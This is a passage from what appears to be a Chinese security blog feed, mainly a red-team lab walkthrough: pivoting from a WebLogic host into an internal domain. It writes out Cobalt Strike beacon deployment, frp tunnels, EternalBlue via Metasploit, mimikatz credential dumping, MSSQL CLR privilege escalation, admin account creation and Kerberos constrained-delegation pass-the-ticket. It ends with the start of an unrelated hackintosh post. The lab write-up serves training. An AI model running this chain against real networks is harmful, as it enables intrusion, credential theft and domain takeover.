CS</p><p>在 VPS 或者虚拟机 kali 上开启 CS server,生成监听器,执行命令</p><p><img src="https://img-blog.csdnimg.cn/img_convert/387a4c292073f6d5452bdfaa52c6e0e0.png" alt="image-20220507160155736"></p><p>上线</p><p><img src="https://img-blog.csdnimg.cn/img_convert/d32c860123c00b3b4fd2384f9ef5ef25.png" alt="image-20220507160209182"></p><p>通过命令发现存在第二个网卡,是一个内网网段</p><p><img src="https://img-blog.csdnimg.cn/img_convert/65c0b09ca8f89bb9513db47ad100f96c.png" alt="image-20220507160554444"></p><h2 id="3-内网横向"><a href="#3-内网横向" class="headerlink" title="3.内网横向"></a>3.内网横向</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><ul><li><p>抓取主机密码</p><p><img src="https://img-blog.csdnimg.cn/img_convert/06c209be7dcc7ab432985a32c12b91a2.png" alt="image-20220507161002707"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">WEBLOGIC\Administrator ccef208c6485269c20db2cad21734fe7</span><br></pre></td></tr></table></figure><p>靶机为 WinServer 2012 所以不能直接读明文密码</p></li><li><p><strong>判断是否在域内</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ipconfig /all</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/5c61b64ed3835c5b205efabf2a14ef41.png" alt="image-20220507162339102"></p><p>判断在工作组中而不是在域中</p><p>使用以下两条命令再确认一下</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">systeminfo</span><br><span class="line">net config workstation</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/8a0847cf7bfae37a8bb822fcf3fff678.png" alt="image-20220507162536101"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/ee406d060d9c7182a1f28a838ad7f408.png" alt="image-20220507162502035"></p></li></ul><h3 id="存活探测-amp-漏洞扫描"><a href="#存活探测-amp-漏洞扫描" class="headerlink" title="存活探测&漏洞扫描"></a>存活探测&漏洞扫描</h3><p>CS 导入 Cobalt-Strike-Aggressor-Scripts 插件组,插件下载地址:<strong><a href="https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts">https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts</a></strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/88b6909ff8e8dd9363104cbb2ae47f0b.png" alt="image-20220507163012012"></p><p>加载之后右击主机列表会出现很多工具</p><p><img src="https://img-blog.csdnimg.cn/img_convert/b90b151806e08a2df57d9c1a2736e292.png" alt="image-20220507163102893"></p><p>向 Victim 机器上传 nbtscan,之后执行 nbtscan 输入目标 10.10.20.0/24</p><p><img src="https://img-blog.csdnimg.cn/img_convert/e659690e8de39a69fbc6629284ed1fc9.png" alt="image-20220507163330797"></p><p>发现一台机器 IP 为 10.10.20.7</p><p>通过文件管理上传 fscan 进行扫描</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell fscan_win32.exe -h 10.10.20.0/24</span><br></pre></td></tr></table></figure><p>确定目标机器为 win7 系统,并且存在永恒之蓝</p><p><img src="https://img-blog.csdnimg.cn/img_convert/3a73440dd63a370a116f890d879fb66b.png" alt="image-20220507163928351"></p><h3 id="搭建代理"><a href="#搭建代理" class="headerlink" title="搭建代理"></a>搭建代理</h3><ol><li><p>搭建 Frp 隧道,进行漏洞利用,Kali 上配置 Frps.ini 配置文件</p><p><img src="https://img-blog.csdnimg.cn/img_convert/f0db1cb9f76b182fd52b6d4c13d1a5c6.png" alt="image-20220507164347971"></p><p>启动 Frps</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./frps -c frps.ini</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/f88fe2b96977525b12121e0cd9e9fa5f.png" alt="image-20220507164613634"></p></li><li><p>Victim 上传 frpc.exe 和 frpc.ini</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr = VPS/kali ip</span><br><span class="line">server_port = 7000</span><br><span class="line"></span><br><span class="line">[plugin_socks]</span><br><span class="line">type = tcp</span><br><span class="line">remote_port = 7777</span><br><span class="line">plugin = socks5</span><br></pre></td></tr></table></figure><p>启动 frpc</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell frpc.exe -c frpc.ini</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/74c5b88c3e1bda17df18566042555496.png" alt="image-20220507165114178"></p><p>启动之后代理就搭建完毕了,这样攻击者就可以通过跳板机 weblogic 靶机向内网发起访问请求</p></li></ol><h3 id="ms17010"><a href="#ms17010" class="headerlink" title="ms17010"></a>ms17010</h3><p>因为内网 win7 主机存在 ms17010 直接用 msf </p><p>首先拿到 meterpreter 会话</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msf6 > setg Proxies socks5:192.168.43.58:7777</span><br><span class="line">msf6 > setg ReverseAllowProxy true</span><br><span class="line">msf6 > use exploit/windows/smb/ms17_010_eternalblue</span><br><span class="line">msf6 > set payload windows/x64/meterpreter/bind_tcp</span><br><span class="line">msf6 > set rhost 10.10.20.7</span><br><span class="line">msf6 > run</span><br></pre></td></tr></table></figure><p>proxy 的 IP 就是 kali 的 IP,rhost 就是内网地址</p><p>在 msf 攻击中可以清晰的看到攻击流程,使用的是目标 smb 445 端口</p><p>第一次以蓝屏终结</p><p><img src="https://img-blog.csdnimg.cn/img_convert/5733fd0ae247e78ce085b23ef76677f3.png" alt="image-20220508105156665"></p><p><strong>MSF永恒之蓝mf17010失败原因</strong></p><ol><li>一次没有成功再多次尝试</li><li>目标机器蓝屏</li><li>MSF payload 为 64 位目标机器也需要 64 位,也 python 有 32 位 的 payload</li><li>永恒之蓝流量比较大</li></ol><p>修改了下 win7 靶机内存调整到了 2G,第二次尝试成功</p><p><img src="https://img-blog.csdnimg.cn/img_convert/a36422f328b7f0ccb490f9303b10f642.png" alt="image-20220508105707845"></p><p>拿到 meterpreter</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c1aa78437073208b5b07a254e74142a8.png" alt="image-20220508105805150"></p><h3 id="抓密码"><a href="#抓密码" class="headerlink" title="抓密码"></a>抓密码</h3><p>加载 mimikatz 读密码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">load mimikatz</span><br><span class="line">msv</span><br><span class="line">kerberos</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/1e893fc7c920aa2fddf24e86af7d463d.png" alt="image-20220508105943889"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/c1c02b393b775f3873070238e45dec92.png" alt="image-20220508110552191"></p><p>也可以加载新版 mimikatz - wiki</p><p><img src="https://img-blog.csdnimg.cn/img_convert/916a442af23806ca7c89784da7bf4c0a.png" alt="image-20220508110643832"></p><p>可以发现没有明文密码,因为 win7 管理员没有登录,所以没有抓取到明文密码,只需要管理员登录机器再次执行命令就可以抓到明文密码</p><p><img src="https://img-blog.csdnimg.cn/img_convert/24630c2ce6b77982ea9aa7c291080786.png" alt="image-20220508111022485"></p><h2 id="4-二层内网域渗透"><a href="#4-二层内网域渗透" class="headerlink" title="4.二层内网域渗透"></a>4.二层内网域渗透</h2><p>PS:因为我的电脑重启地址基本都换了,更新下 IP,需要重新搭 frp 和 msf 连接</p><blockquote><p>server 2012 weblogic:192.168.43.93</p><p>kali:192.168.43.99</p></blockquote><h3 id="win7上线cs"><a href="#win7上线cs" class="headerlink" title="win7上线cs"></a>win7上线cs</h3><p>在 cs 中 win7 中转上线,现在上线 cs 的几种思路</p><ol><li>msf 上传 cs 的后门 exe 执行</li><li>msf 的 meterpeter spawn 到 cs 会话</li><li>cs 通过 ipc$ 上传 cs 后门到 win7 靶机通过计划任务执行</li></ol><p>使用方案一</p><p>1.CS 设置中转监听器</p><p><img src="https://img-blog.csdnimg.cn/img_convert/01bb266ebb83732c2081794d0476180f.png" alt="image-20220508111333148"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/8a6884eb675b6afa7e052f4bd7968742.png" alt="image-20220508111338364"></p><p>2.生成后门</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1f2d5eea0895b1de259889cc6b9fcc07.png" alt="image-20220508131115128"></p><p>把后门上传到 kali,然后在 msf 中使用命令上传到靶机 win7</p><p><strong><img src="https://img-blog.csdnimg.cn/img_convert/4baa7f87ee4a04e38f6909b0c7d58a3d.png" alt="image-20220508132517982"></strong></p><p>进入 shell,执行 beacon.exe</p><p><img src="https://img-blog.csdnimg.cn/img_convert/fa5b114608f357b6f32e03f2ab861bdb.png" alt="image-20220508132547578"></p><p>成功上线 cs</p><p><img src="https://img-blog.csdnimg.cn/img_convert/d2b14865a05a3f994c6339ecbe2dcda6.png" alt="image-20220508132607160"></p><h3 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>内网信息收集</h3><ul><li>```<br>shell whoami<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>shell ipconfig<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"> 发现内网 10.10.10.0/24 段</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">- **判断是否域环境**</span><br><span class="line"></span><br></pre></td></tr></table></figure>shell ipconfig /all<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>shell net user /domain<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">- 确定域控主机 IP</span><br><span class="line"></span><br></pre></td></tr></table></figure>net group “Domain Controllers” /domain<br>或者 net time /domain<br>ping owa -n 2<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">当前进程是没有域管的,所以暂且放弃令牌窃取</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">由于我们已经通过 ms17010 -> mimikatz 拿到了一个域用户的账户密码,尝试查找约束委派的用户</span><br><span class="line"></span><br><span class="line">首先向 win7 靶机上传 adfind 工具</span><br><span class="line"></span><br><span class="line"> ```bash</span><br><span class="line"># 查询配置了非约束委派的主机:</span><br><span class="line">AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName</span><br><span class="line"># 查询配置了非约束委派的用户:</span><br><span class="line">AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName</span><br><span class="line"># 查询配置了约束委派的主机:</span><br><span class="line">AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto</span><br><span class="line"></span><br><span class="line"># 查询配置了约束委派的用户:</span><br><span class="line">AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto</span><br></pre></td></tr></table></figure></li></ul><p><img src="https://img-blog.csdnimg.cn/img_convert/116c34bb03d87808ac292643985a8c04.png" alt="image-20220508135251614"></p><p>找到了一个 sqlserver 的用户是被设置了约束委派,得想办法搞到这个用户的账密</p><p>上传 fscan.exe 到靶机进行信息收集和漏洞扫描</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c942aa4136fb566135a2dedc25fcef44.png" alt="image-20220508154210862"></p><blockquote><p>PS:如果没有扫到 1433 端口,就进虚拟机把 SQL server 启动,启动不了</p><p>看这篇文章:<a href="https://link.juejin.cn/?target=https://www.fengjunzi.com/blog-25573.html">链接</a>,因为过试用期了,需要升级重新输入密码</p><p>正常启动</p><p><img src="https://img-blog.csdnimg.cn/img_convert/774c84d30e556aa9241040f6b1b5b127.png" alt="image-20220508154057558"></p></blockquote><p>根据他开放的端口尝试以下操作:</p><ol><li>80 端口 web 漏洞</li><li>1433 SQL server 漏洞</li><li>445 smb 等端口系统漏洞</li></ol><p>其他拿域控思路:<a href="https://mp.weixin.qq.com/s/maa01jOdXw_G_4uJ-_YZXg">域控被突破的几种途径v2</a></p><h3 id="二层Frp代理"><a href="#二层Frp代理" class="headerlink" title="二层Frp代理"></a>二层Frp代理</h3><p><strong>现在尝试 80 端口漏洞</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/9b86bb5c67caaa0eb198584eec49e631.png" alt="image-20220508161840412"></p><ol><li><p>搭建使用 frp 多层代理,修改 weblogic 的 frp 配置文件,weblogic 既是客户端,也是服务端,需要修改 frps.ini,通过 cs 上传 frps 和 frps.ini </p><p><img src="https://img-blog.csdnimg.cn/img_convert/a367563e507a3f034b0f0f1ccac95772.png" alt="image-20220508155905811"></p><p>启动 frps</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell frps.exe -c frps.ini</span><br></pre></td></tr></table></figure></li><li><p>数据服务器开启 frpc</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell frpc.exe -c frpc.ini</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr = 10.10.20.12</span><br><span class="line">server_port = 1111</span><br><span class="line"></span><br><span class="line">[http_proxy]</span><br><span class="line">type = tcp</span><br><span class="line">remote_port = 7777</span><br><span class="line">plugin = socks5</span><br></pre></td></tr></table></figure><p>建立链接</p><p><img src="https://img-blog.csdnimg.cn/img_convert/968eddd5fb0a1d42c28dcef289da251a.png" alt="image-20220508162507851"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/a1c326e00ef08d6044fbeaffee2a26fe.png" alt="image-20220508162514238"></p></li><li><p>在攻击者的 windows 电脑上可以用 proxifier 设置代理链</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1333ef1bf22ffe4641e66e9b7c32da93.png" alt="image-20220508162704748"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/8cfc19e7dd68cea57c7d5b4e501c3476.png" alt="image-20220508162717407"></p><p>在攻击者的 windows 电脑上可以正常访问 10.10.10.18</p><p><img src="https://img-blog.csdnimg.cn/img_convert/6a4a64f75b78a08e5dd25dceb79c95cb.png" alt="image-20220508162922505"></p></li></ol><p>发现 80 端口并没有什么利用点,尝试利用 SQL sever,因为现在搭建了二层代理所以部分操作可以用 windows 物理机直接攻击</p><h3 id="打数据服务器SQL-server"><a href="#打数据服务器SQL-server" class="headerlink" title="打数据服务器SQL server"></a>打数据服务器SQL server</h3><p>尝试爆破 SQL server 密码</p><p>使用工具成功爆破用户密码</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c86b9fd9c6de214ab6d1ae4f49bcb06d.png" alt="image-20220508163342992"></p><p>可以看到流量被转发</p><p><img src="https://img-blog.csdnimg.cn/img_convert/03fdc9c84e8e7e87995b8d3c80f64d9e.png" alt="image-20220508163339943"></p><p>这样就拿到了域控主机的 SQL server 密码</p><p>随后利用 <a href="https://github.com/uknowsec/SharpSQLTools/releases/tag/41">SharpSQLTools.exe</a> 工具对其进行 xp_cmdshell 调用系统命令,或者 SqlKnife 这个工具</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/b6c72ab3586150c1979c1565fe0529e1.png" alt="image-20220508164101746"></p><p>却认为域控 ip</p><p><img src="https://img-blog.csdnimg.cn/img_convert/069317cf5d6c5ce468e149e6b66148ea.png" alt="image-20220508164215612"></p><p>目前的权限是<code>nt authority\network service</code> 即为普通服务权限,</p><blockquote><p>由于目标机器不出网不存在让他下载我们的 exe,随后使用 MSF + Proxychains 调用 xpcmdshell 模块上线到 MSF,但是失败了</p><p><img src="https://img-blog.csdnimg.cn/img_convert/3d8fcf2b2391f0daf9842b55a4938c85.png" alt="image-20220508164827961"></p><p>既然上线失败且目标是 iis,那么想办法找到 iis 到目录写个一句话吧</p><p>一般 iis 的目录是:<code>C:\inetpub\wwwroot</code>,那么查看下是否存在</p></blockquote><p><img src="https://img-blog.csdnimg.cn/img_convert/1d60d5dee831bc2c8e23867617f451b4.png" alt="image-20220508165057165"></p><p>确实存在此目录,尝试写入文件,权限太小失败</p><p><img src="https://img-blog.csdnimg.cn/img_convert/498ee7ee42cf07fc69323991f67d2078.png" alt="image-20220508165248135"></p><p>在 MSSQL 中使用 CLR 组件提权,提权原理可以看这篇文章:<a href="https://www.anquanke.com/post/id/250346">https://www.anquanke.com/post/id/250346</a></p><p>在搜这个提权的时候还发现了一个华点就是搜关键词 install_clr 就可以搜到这个靶场的 wp</p><p>使用 SharpSQLTools 开启目标 clr,进行提权</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SharpSQLTools.exe 10.10.10.18 sa sa master install_clr <span class="built_in">whoami</span></span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/9bc05fd0b2ce2fbb4013621e7c05d245.png" alt="image-20220508165906554"></p><p>然后启用并调用命令:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr</span><br><span class="line">SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/d412192364596aaf3c2d6f7870eaeedd.png" alt="image-20220508170007322"></p><p>提权成功,只能说太牛皮了</p><p>添加一个管理员权限用户,用户名为 ocean.com 密码为 qwe.123</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net user ocean.com qwe.123 /add"</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/f04f800faa76bc14fdcb66ca6b4e0eaf.png" alt="image-20220508170331564"></p><p>升级为 admin 组</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net localgroup administrators ocean.com /add"</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/4e58c6005c44c8dd6f21b3ea2375090a.png" alt="image-20220508170508054"></p><p>查看用户</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net user"</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/307f38106054b70103329cc532fb1536.png" alt="image-20220508170619457"></p><blockquote><p>其他师傅试了多种方法都不行,他们最终选择了 msf,我就直接用 msf 了,其他师傅的文章可以在参考连接中找到</p></blockquote><h3 id="上线CS"><a href="#上线CS" class="headerlink" title="上线CS"></a>上线CS</h3><p>漏洞利用拿下的 win7 做中继,用 CS 生成马,通过 meterpreter 传上去 msf 的 payload,但是需要首先为 kali 设置代理,因为之前使用 frp 搭建了二层隧道,所以这里只需要设置 proxychains 的配置文件即可</p><p>1.设置 kali proxychains 代理保证 kali msf 可以访问到 10.10.10.18</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vi /etc/proxychains.conf</span><br></pre></td></tr></table></figure><p>代理链就和 Windows 物理机一样</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1a498e32d4a5036d366e0887dde0333b.png" alt="image-20220508172723808"></p><p>2.上线 msf</p><p>使用代理启动 msf</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains msfconsole</span><br></pre></td></tr></table></figure><p>使用 mssql_clr_payload 模块</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/mssql/mssql_clr_payload</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/726f210a987afbf931b7d9695bfa704a.png" alt="image-20220508172257116"></p><p>3.生成中转上线的 cs 马,新建一个监听器,这里需要多层代理</p><p>生成 beacon.exe</p><p>4.通过 msf 上传 beacon.exe 并且执行,上线 sc,但是只有服务权限</p><p>使用 SharpSQLTools.exe 去执行 beacon,获取高权限用户,拿到 SQL server 主机</p><h2 id="5-域内委派拿域控"><a href="#5-域内委派拿域控" class="headerlink" title="5.域内委派拿域控"></a>5.域内委派拿域控</h2><p>cs 中拿到用户密码</p><p><img src="https://img-blog.csdnimg.cn/img_convert/5afe8cbae21133e1c7e51738c5e275fb.png" alt="image-20220509080607350"></p><p>之前信息搜集的时候我们知道 <code>sqlserver</code> 是一个约束委派的用户,我们可以通过约束委派攻击来接管域控</p><p>通过 cs 上传工具 kekeo,利用 kekeo 请求该用户的 TGT:<code>[email protected][email protected]</code></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kekeo.exe <span class="string">"tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"</span></span><br></pre></td></tr></table></figure><p>然后使用这张 TGT (<code>[email protected][email protected]</code>) 获取域机器的 ST:<code>[email protected]@[email protected]</code></p> <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kekeo.exe <span class="string">"tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/owa.redteam.red"</span></span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/16f1fffa49d4a716d55f2c7a337faf31.png" alt="image-20220509082530523"></p><p>使用 mimikatz 将 ST2 导入当前会话即可,运行 mimikatz 进行 ptt:</p> <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz kerberos::ptt [email protected]@[email protected]</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/1fece20a25a8d35fa088584fa6f91fcb.png" alt="image-20220509082625206"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/42c7e47bd5c09d227728b21ba0ea006a.png" alt="image-20220509082653026"></p><p>参考链接</p><p><a href="http://moonflower.fun/index.php/2022/03/06/300/">http://moonflower.fun/index.php/2022/03/06/300/</a></p><p><a href="https://mp.weixin.qq.com/s/dcYbIfLwN-Aw0Z9XxQSGkQ">https://mp.weixin.qq.com/s/dcYbIfLwN-Aw0Z9XxQSGkQ</a></p><p><a href="https://xie.infoq.cn/article/2edac2bc38860fa97386f7c27">https://xie.infoq.cn/article/2edac2bc38860fa97386f7c27</a></p><p><img src="https://img-blog.csdnimg.cn/img_convert/d717a424deb896a4ca97a7f1f83da1f8.png"></p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png"><br>从外网 Weblogic 打进内网,再到约束委派接管域控</p>
<p>靶场来自渗透攻击红队,官方 wp 及下载地</summary>
<category term="RedTeam" scheme="https://oceansec.github.io/categories/RedTeam/"/>
<category term="靶场,Redteam,内网" scheme="https://oceansec.github.io/tags/%E9%9D%B6%E5%9C%BA-Redteam-%E5%86%85%E7%BD%91/"/>
</entry>
<entry>
<title>机械革命z2黑苹果双系统改造计划</title>
<link href="https://oceansec.github.io/2023/12/05/%E6%9C%BA%E6%A2%B0%E9%9D%A9%E5%91%BDz2%E9%BB%91%E8%8B%B9%E6%9E%9C%E5%8F%8C%E7%B3%BB%E7%BB%9F%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92/"/>
<id>https://oceansec.github.io/2023/12/05/%E6%9C%BA%E6%A2%B0%E9%9D%A9%E5%91%BDz2%E9%BB%91%E8%8B%B9%E6%9E%9C%E5%8F%8C%E7%B3%BB%E7%BB%9F%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92/</id>
<published>2023-12-05T02:59:04.862Z</published>
<updated>2023-02-14T02:44:20.820Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/img_convert/8ba3e95f30711a4d9397800037e6777e.png"><br>机械革命z2黑苹果改造计划</p><p>原来的系统硬盘才256G实在太小了,趁固态便宜搞了一块大华C900Plus-b 1T固态,加上之前电脑里后加的一块海康威视c2000pro 1T准备搞一个win+mac双系统生产力工具</p><h1 id="黑苹果效果展示"><a href="#黑苹果效果展示" class="headerlink" title="黑苹果效果展示"></a>黑苹果效果展示</h1><p><img src="https://img-blog.csdnimg.cn/386740a945a342d7a0c4a8fd1fd101cd.png" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/bc7b8daf21c24323bf6e4dca86885c0a.gif" alt="在这里插入图片描述"></p><p>黑苹果的详细教程b站上有很多,也可以看下国光师傅的博客,<a href="https://apple.sqlsec.com/%EF%BC%8C%E6%9C%89%E6%96%87%E5%AD%97%E5%92%8C%E8%A7%86%E9%A2%91%E6%95%99%E7%A8%8B%EF%BC%8C%E5%AF%B9%E4%BA%8E%E9%BB%91%E8%8B%B9%E6%9E%9C%E5%BC%95%E5%AF%BCefi%E6%9C%89%E9%9D%9E%E5%B8%B8%E8%AF%A6%E7%BB%86%E7%9A%84%E4%BB%8B%E7%BB%8D">https://apple.sqlsec.com/,有文字和视频教程,对于黑苹果引导efi有非常详细的介绍</a></p><p>当然网上也有大神提供了适配好efi的直装镜像,<a href="https://www.cmbs-soft.com/%EF%BC%8C%E8%BF%99%E4%B8%AA%E7%BD%91%E7%AB%99%E6%8F%90%E4%BE%9B%E9%92%88%E5%AF%B9%E6%9C%BA%E6%A2%B0%E9%9D%A9%E5%91%BD%E7%B3%BB%E5%88%97%E7%AC%94%E8%AE%B0%E6%9C%AC%E7%94%B5%E8%84%91%E7%9A%84efi%E5%BC%95%E5%AF%BC%E6%96%87%E4%BB%B6%E5%92%8C%E7%9B%B4%E8%A3%85%E9%95%9C%E5%83%8F">https://www.cmbs-soft.com/,这个网站提供针对机械革命系列笔记本电脑的efi引导文件和直装镜像</a></p><h1 id="直装镜像的黑苹果安装步骤"><a href="#直装镜像的黑苹果安装步骤" class="headerlink" title="直装镜像的黑苹果安装步骤"></a>直装镜像的黑苹果安装步骤</h1><p>以下步骤双硬盘windows+macos系统,即为一个硬盘安装windows一个硬盘安装macOS,这样可以保证一个系统出现问题时另外一个系统的稳定性。单硬盘双系统也大同小异</p><h2 id="1-写入U盘使用将镜像写入U盘"><a href="#1-写入U盘使用将镜像写入U盘" class="headerlink" 